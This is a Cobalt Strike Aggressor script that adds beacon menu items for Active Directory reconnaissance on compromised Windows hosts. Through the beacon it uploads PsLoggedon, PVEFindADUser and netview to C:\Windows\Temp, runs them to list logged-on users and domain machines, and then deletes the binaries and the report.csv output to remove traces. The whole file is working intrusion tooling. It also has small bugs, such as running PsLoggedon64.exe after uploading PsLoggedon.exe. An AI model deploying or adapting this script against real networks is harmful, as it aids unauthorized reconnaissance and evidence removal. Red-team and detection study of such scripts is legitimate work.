menu "Location domain management" {
  menu "PsLoggedon" {
    item "UploadPsLoggedon" {
      $bid = $1;
      $dialog = dialog("Upkoad PsLoggedon", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &PsLoggedon);
      dialog_description($dialog, "Microsoft official tool, some functions of this tool require administrator rights. project address：https://docs.microsoft.com/zh-cn/sysinternals/downloads/psloggedon");
      drow_text($dialog, "UploadPath",  "Upload path: ");
      dbutton_action($dialog, "Upload");
      dialog_show($dialog);
    }
    sub PsLoggedon{
      bcd($bid, $3['UploadPath']);
			if (-is64 $bid['id']) {
				bupload($bid, script_resource("/scripts/Locate AD/x64/PsLoggedon.exe"));
			}else{
				bupload($bid, script_resource("/scripts/Locate AD/x86/PsLoggedon.exe"));
			}
    }
    item "Run PsLoggedon"{
      bshell($bid, "PsLoggedon64.exe");
    }
    item "Delete PsLoggedon"{
      local('$bid');
      foreach $bid ($1){
        bshell($1, "del /f /s /q PsLoggedon.exe");
      }
    }
  }

  item "PVEFindADUser" {
    bexecute_assembly($1, script_resource("/scripts/Locate AD/PVEFindADUser.exe"),"-current");
    bshell($1, "del /f /s /q report.csv");
  }

  menu "netview" {
    item "Upload netview" {
      $bid = $1;
      $dialog = dialog("Upload netview", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &netview);
      dialog_description($dialog, "Most functions do not require administrator rights. project address：https://github.com/mubix/netview");
      drow_text($dialog, "UploadPath",  "Upload path: ");
      dbutton_action($dialog, "Upload");
      dialog_show($dialog);
    }
    sub netview {
      bcd($bid, $3['UploadPath']);
      bupload($bid, script_resource("/scripts/Locate AD/netview.exe"));
    }
    item "Run netview"{
      $bid = $1['@'];
      $Dialog = dialog("Run netview",%(domain => "xxx.com",bid => $bid),&netview_run);
      drow_text($Dialog, "domain", "domain: ");
      dbutton_action($Dialog, "run");
      dialog_show($Dialog);
    }
    sub netview_run{
      local('$Name');
      $Name = $3['domain'];
      bshell($bid, "netview.exe   $+ $Name");
    }
    item "Delete netview"{
      local('$bid');
      foreach $bid ($1){
        bshell($1, "del /f /s /q netview.exe");
      }
    }
  }



}
